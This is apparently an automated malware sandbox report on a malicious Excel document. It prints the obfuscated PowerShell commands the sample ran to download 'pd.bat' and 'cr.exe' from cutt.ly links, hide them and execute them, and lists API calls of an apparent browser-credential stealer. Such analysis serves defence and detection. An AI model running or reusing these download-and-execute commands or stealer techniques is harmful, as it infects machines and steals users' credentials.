Jan 8, 2021 09:08:12.033230066 CET | 104.18.58.219 | 443 | 192.168.2.22 | 49176 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Wed Dec 23 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020 | Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
 |  |  |  |  | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |  |
Jan 8, 2021 09:08:26.568110943 CET | 104.18.58.219 | 443 | 192.168.2.22 | 49177 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Wed Dec 23 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020 | Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
 |  |  |  |  | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |  |

                                                        Code Manipulations

                                                        System Behavior

                                                        General

                                                        Start time:09:05:53
                                                        Start date:08/01/2021
                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                        Imagebase:0x13f480000
                                                        File size:27641504 bytes
                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:56
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:56
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:58
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:59
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:59
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, Author: Florian Roth
                                                        Reputation:high

                                                        General

                                                        Start time:09:06:04
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\attrib.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                                                        Imagebase:0xff680000
                                                        File size:18432 bytes
                                                        MD5 hash:C65C20C89A255517F11DD18B056CADB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:10
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:11
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\mode.com
                                                        Wow64 process (32bit):false
                                                        Commandline:mode 18,1
                                                        Imagebase:0xffea0000
                                                        File size:30208 bytes
                                                        MD5 hash:718E86CB060170430D4EF70EE39F93D4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:11
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ver
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:12
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:09:06:13
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Start time:09:06:19
                                                        Start date:08/01/2021
                                                        Path:C:\Users\user\AppData\Roaming\cr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\AppData\Roaming\cr.exe'
                                                        Imagebase:0x400000
                                                        File size:565248 bytes
                                                        MD5 hash:740E559929463320CB8E0403FD35A097
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 72%, ReversingLabs

                                                        Disassembly

                                                        Code Analysis

                                                          Executed Functions

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00425765
                                                          • CoInitialize.OLE32(00000000), ref: 00425786
                                                            • Part of subcall function 00434F05: OpenMutexA.KERNEL32 ref: 00434F56
                                                            • Part of subcall function 00434F05: CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00434F63
                                                          • CoUninitialize.OLE32 ref: 00431CE9
                                                            • Part of subcall function 00437B2C: GetCurrentProcess.KERNEL32(00000008,?), ref: 00437B3E
                                                            • Part of subcall function 00437B2C: OpenProcessToken.ADVAPI32(00000000), ref: 00437B45
                                                            • Part of subcall function 00437B2C: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00437B5F
                                                            • Part of subcall function 00437B2C: GetLastError.KERNEL32 ref: 00437B69
                                                            • Part of subcall function 00437B2C: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00437B79
                                                            • Part of subcall function 00437B2C: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00437B8D
                                                            • Part of subcall function 00437B2C: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437BA1
                                                            • Part of subcall function 00437B2C: GlobalFree.KERNEL32(00000000), ref: 00437BC1
                                                          • GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 004257CA
                                                          • GetLocaleInfoA.KERNELBASE(00000000), ref: 004257D1
                                                            • Part of subcall function 00437BD1: __EH_prolog.LIBCMT ref: 00437BD6
                                                            • Part of subcall function 00437BD1: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00437C37
                                                            • Part of subcall function 00437BD1: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00437C51
                                                            • Part of subcall function 00437BD1: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00437CC5
                                                            • Part of subcall function 00437BD1: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00437CD7
                                                            • Part of subcall function 00437BD1: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00437CF2
                                                            • Part of subcall function 00437BD1: CloseHandle.KERNEL32(?), ref: 00437CFF
                                                            • Part of subcall function 00437BD1: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00437D12
                                                            • Part of subcall function 00410D75: __EH_prolog.LIBCMT ref: 00410D7A
                                                            • Part of subcall function 00411173: __EH_prolog.LIBCMT ref: 00411178
                                                            • Part of subcall function 00433035: __EH_prolog.LIBCMT ref: 0043303A
                                                            • Part of subcall function 00433035: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047913B,00000000), ref: 00433083
                                                            • Part of subcall function 00433035: WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?,?,?,?,0047913B,00000000), ref: 00433150
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          • Sleep.KERNELBASE(00001388,GET,0047913B), ref: 00425D3F
                                                          • GetUserNameA.ADVAPI32(?,00000101), ref: 00425FC0
                                                            • Part of subcall function 00433035: WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047913B,00000000), ref: 00433227
                                                            • Part of subcall function 00433035: _strlen.LIBCMT ref: 004332C7
                                                            • Part of subcall function 00433035: _strlen.LIBCMT ref: 004332D1
                                                            • Part of subcall function 00433035: WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047913B,00000000), ref: 004332E8
                                                            • Part of subcall function 00433035: WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047913B,00000000), ref: 004332FA
                                                            • Part of subcall function 00433035: WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,?,?,0047913B,00000000), ref: 00433312
                                                            • Part of subcall function 00433035: WinHttpReadData.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,0047913B,00000000), ref: 00433347
                                                          • _strlen.LIBCMT ref: 00426266
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00012EFA,00000000,00000000,00000000), ref: 004264E6
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00013396,00000000,00000000,00000000), ref: 004264F8
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00013A83,00000000,00000000,00000000), ref: 0042650A
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000141D0,00000000,00000000,00000000), ref: 0042651C
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000149F1,00000000,00000000,00000000), ref: 0042652E
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00014CBC,00000000,00000000,00000000), ref: 00426540
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_0001510A,00000000,00000000,00000000), ref: 00426552
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_0001536E,00000000,00000000,00000000), ref: 00426564
                                                            • Part of subcall function 00422B5C: __EH_prolog.LIBCMT ref: 00422B61
                                                            • Part of subcall function 0041145D: ___std_fs_get_stats@16.LIBCPMT ref: 0041147D
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_0000CB61,?,00000000,00000000), ref: 0042676E
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00426781
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00023CBB,00000000,00000000,00000000), ref: 00426797
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004267A4
                                                          • _strlen.LIBCMT ref: 00426289
                                                            • Part of subcall function 00431E88: __EH_prolog.LIBCMT ref: 00431E8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Create$Thread$H_prologHttp$Open$Token$Process_strlen$DataDeallocateGlobalInformationMutexNameObjectRequestSingleUserWait$AllocAvailableCloseConnectConvertCurrentDefaultDuplicateErrorFileFirstFreeHandleInfoInitializeLastLocaleModuleProcess32QueryReadReceiveResponseSendSleepSnapshotStringToolhelp32Uninitialize___std_fs_get_stats@16
                                                          • String ID: !$!$$$$$$$%$%$%$%$%*$%-*-$($($)$-$-$-fT_JTW$.$/$/error.php$0$2$3$442964986e275016d0e4a3e3ec40e0d6 $5$5$5$6$6$6$8$;$=$=$><$@$A$A$C$C$C$D$D$E$GET$H$I$J$J$M$N$O$P$POST$T$T$U$U$V$W$X~>e2+76$\$]$^$_$_id$`$a$b$b$bje$e$f$fh$f|k\$gate/$gmn$j$j$jy~x$k$k$location$machineinfo.txt$o$o$p2UZSfO0NScL56aJyJpLvMwHBuGfS5Krn8VfshnPG7BYXExKg3FMbQ== $q$q$q$qSVdAbi/K2pP5PzejMhd4MMaCaHKR9e80ZoKsFw= $s$screen.jpeg$sqlite3.dll$u$v$v$w$w$w$y$z${$|k\$}$~$#$Em
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040B836
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B881
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B8B3
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B8FC
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B934
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B969
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B99E
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B9CF
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040BA11
                                                          • wsprintfA.USER32 ref: 0040BA84
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 0043464E: __EH_prolog.LIBCMT ref: 00434653
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040C10D
                                                          • LocalFree.KERNEL32(?,?,?), ref: 0040C16F
                                                          • LocalFree.KERNEL32(?), ref: 0040C230
                                                            • Part of subcall function 0040908B: __EH_prolog.LIBCMT ref: 00409090
                                                            • Part of subcall function 0040908B: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 004090F6
                                                            • Part of subcall function 0040908B: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 00409114
                                                            • Part of subcall function 0040908B: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 00409135
                                                            • Part of subcall function 0040908B: LocalAlloc.KERNEL32(00000040,?), ref: 0040918C
                                                            • Part of subcall function 0040908B: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004091B7
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040C1EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc$Crypt$H_prologLocal$DataDeallocateFreeUnprotect$AlgorithmAllocDecryptGenerateOpenPropertyProviderSymmetricwsprintf
                                                          • String ID: "},$360Browser$Opera$UCBrowser$v10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00409D57
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409D9F
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409DD1
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409E10
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409E48
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409E7D
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409EAE
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409EF0
                                                          • wsprintfA.USER32 ref: 00409F64
                                                            • Part of subcall function 00408F32: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,?,?,0000000F,00000000,00408E93), ref: 00408F45
                                                            • Part of subcall function 00408F32: DeleteFileTransactedA.KERNEL32(?,00000000), ref: 00408F5C
                                                            • Part of subcall function 00408F32: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,0000000F,00000000,00408E93,?,?,?,00414AC4,00000000), ref: 00408F67
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 00409D11: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00409D3F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc$Transaction$CommitCreateDeallocateDeleteFileH_prologIos_base_dtorTransactedstd::ios_base::_wsprintf
                                                          • String ID: "},$Opera$v10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00409295
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0000002A,?,00000000), ref: 004093AD
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 004093B4
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0000002A,?,00000000), ref: 00409543
                                                          • HeapFree.KERNEL32(00000000,?,0000002A), ref: 0040954A
                                                            • Part of subcall function 00408D6C: __EH_prolog.LIBCMT ref: 00408D71
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Heap$FreeH_prologProcess$Deallocate
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindClose.KERNEL32(000000FF,?,0043DD01,?,?,?,?,004088E6,?,?), ref: 0043DCDE
                                                          • FindFirstFileExW.KERNELBASE(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,?,0043DD01,?,?), ref: 0043DD0E
                                                          • GetLastError.KERNEL32(?,?,0043DD01,?,?,?,?,004088E6,?,?), ref: 0043DD1B
                                                          • FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,0043DD01,?,?,?,?,004088E6,?,?), ref: 0043DD35
                                                          • GetLastError.KERNEL32(?,?,0043DD01,?,?,?,?,004088E6,?,?), ref: 0043DD42
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Find$ErrorFileFirstLast$Close
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0041339B
                                                            • Part of subcall function 0041593A: _memcmp.LIBVCRUNTIME ref: 0041595E
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 004117B9: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,?,?,?,0000000F), ref: 004117CF
                                                            • Part of subcall function 004117B9: CopyFileTransactedA.KERNEL32 ref: 004117F5
                                                            • Part of subcall function 004117B9: CommitTransaction.KTMW32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,0000000F,?,?), ref: 00411800
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                            • Part of subcall function 0041181B: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,0000000F,00000000,?,?,00414B2E,00000000,00000000), ref: 0041182F
                                                            • Part of subcall function 0041181B: CreateDirectoryTransactedA.KERNEL32(00000000,?,00000000,00000000), ref: 00411848
                                                            • Part of subcall function 0041181B: CommitTransaction.KTMW32(00000000,?,0000000F,00000000,?,?,00414B2E,00000000,00000000), ref: 00411853
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Transaction$Create$CommitDeallocateH_prologTransacted$CopyDirectoryFile_memcmp_strcat
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserNameA.ADVAPI32(?,?), ref: 00434BFF
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0043FFBE
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0043341E
                                                          • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00489D28,0000000F,00489C68), ref: 00433456
                                                          • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0043347C
                                                          • WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 0043354B
                                                            • Part of subcall function 004379A1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 004379C6
                                                            • Part of subcall function 004379A1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 004379FB
                                                          • WinHttpConnect.WINHTTP(00000000,00000000,00000050,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00433595
                                                          • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 00433607
                                                          • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 0043366B
                                                          • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043369F
                                                          • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 004336AD
                                                          • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 004336C1
                                                          • WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 004336F2
                                                          • WriteFile.KERNELBASE(?,00000000,?,50504C24,00000000), ref: 0043370A
                                                          • GetLastError.KERNEL32 ref: 00433724
                                                          • WinHttpCloseHandle.WINHTTP(00000000), ref: 0043372B
